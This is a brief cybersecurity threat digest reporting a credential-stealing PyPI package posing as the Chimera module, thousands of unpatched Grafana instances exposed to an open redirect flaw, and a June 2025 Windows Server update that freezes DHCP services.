Major Incidents or Breaches

  • A malicious package was discovered on the Python Package Index (PyPI), masquerading as the legitimate Chimera module. The package is designed to steal sensitive developer-related information, including AWS credentials, CI/CD secrets, and macOS data.

Newly Discovered Vulnerabilities

  • Over 46,000 internet-facing Grafana instances remain unpatched and exposed to a client-side open redirect vulnerability. This vulnerability allows for the execution of a malicious plugin and could result in account takeover.
  • Microsoft acknowledged that the June 2025 Windows Server security updates are causing DHCP services to freeze on some systems, potentially impacting network operations.

Notable Threat Actor Activity

  • Threat actors are leveraging the PyPI platform to distribute malicious packages targeting developer environments and cloud infrastructure credentials.

Trends, Tools, or Tactics of Interest

  • Continued exploitation of open-source software repositories, such as PyPI, for supply chain attacks targeting developer systems and cloud infrastructure.
  • Ongoing issues with timely patching of widely-used software, as evidenced by the large number of unpatched Grafana instances exposed to critical vulnerabilities.